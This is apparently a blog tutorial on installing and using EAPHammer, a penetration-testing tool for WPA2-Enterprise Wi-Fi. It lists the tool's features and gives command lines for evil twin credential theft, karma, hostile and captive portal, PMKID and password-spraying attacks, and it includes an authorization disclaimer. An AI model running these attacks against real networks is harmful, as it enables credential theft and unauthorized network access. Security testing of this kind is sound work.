How to Install EAPHammer
Posted in: Tools, Wi-Fi Hacking

EAPHammer: Attack WPA2-Enterprise networks

EAPHammer is a tool that was developed to test the security of WPA2-Enterprise networks. It was created by Gabriel Ryan (s0lst1c3) and is designed to exploit vulnerabilities in the Extensible Authentication Protocol (EAP), commonly used in enterprise Wi-Fi networks.

WPA2-Enterprise is a security protocol that provides more robust authentication and encryption mechanisms than the standard WPA2 used in home and small office networks. It relies on a RADIUS server for authentication, and EAP is the protocol used for communication between the client and the server.


  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration is necessary for most attacks.
  • No manual configuration necessary for installation and setup process
  • Leverages latest version of hostapd (2.8)
  • Support for evil twin and karma attacks
  • Generate timed Powershell payloads for indirect wireless pivots
  • Integrated HTTP server for Hostile Portal attacks
  • Support for SSID cloaking
  • Fast and automated PMKID attacks against PSK networks using hcxtools
  • Password spraying across multiple usernames against a single ESSID

Download Full Guide

Our Quick Start section gives an example of how to carry out a credential theft evil twin attack against a WPA/2-EAP network using only commands to show how quick this tool is.

EAPHammer leverages a technique called “EAP Downgrade Attack” to force clients to use weaker EAP methods, such as EAP-MD5 or EAP-LEAP, instead of the more secure EAP methods like EAP-TLS or PEAP. By downgrading the authentication method, the attacker can then attempt to exploit vulnerabilities in the weaker EAP methods to gain unauthorized access to the network.

How to Install EAPHammer

git clone

Generate EAPHammer Certificates

./eaphammer --cert-wizard
./eaphammer -i wlan0 --channel 5 --auth wpa-eap --essid OffWifi --creds

Karma attacks

./eaphammer -i wlan0 --essid offwifi --cloaking full -c 7 --auth open --hostile-portal --karma

PMKID Attacks

./eaphammer --pmkid --interface wlan0 --bssid fc:ad:83:77:fe:ab --channel 10

ESSID Cloaking

./eaphammer -i wlan0 -e CompanyXYZ -c 1 --auth open --hostile-portal --cloaking full

Captive Portal Attacks

./eaphammer --bssid fc:ad:83:77:fe:ab --essid CompanyXYZ --channel 149 --interface wlan0 --captive-portal

Password Spraying

./eaphammer --eap-spray --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 --essid CompanyXYZ --password qwerty1234 --user-list users.txt


It’s important to note that EAPHammer is an offensive security tool and should only be used in authorized and controlled environments for legitimate security testing purposes. Using it to attack networks without proper authorization is illegal and unethical.

Leave a Reply

Back to Top